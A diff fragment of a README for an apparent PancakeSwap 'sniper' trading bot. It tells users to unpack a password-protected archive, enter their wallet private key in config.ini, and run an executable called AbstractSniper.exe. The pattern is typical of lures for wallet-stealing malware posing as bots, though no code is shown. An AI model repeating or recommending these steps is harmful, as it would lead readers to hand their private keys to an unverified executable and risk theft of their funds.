EvaDreamless/Pancakeswap-Sniper-Bot/README.md

    2. Unpack archive, password - AbstractHQ
    3. Edit the config.ini

-    WALLETADDRESS: Your public address.
+     WALLETADDRESS: 0x..., Your public address.

-    PRIVATEKEY: 0x…
+     PRIVATEKEY: 0x…, Your private key

-    LIQUIDITYPOOL: BNB, You can choose any pool.
+     LIQUIDITYPOOL: BNB, You can choose any pool

      TRADEMODE: true, True if you want to activate, it otherwise false

+     BSCSCANAPIKEY: example, 0 if you don't want automatic calculation of fees in USD, token prices in USD, etc.

   4. Open AbstractSniper.exe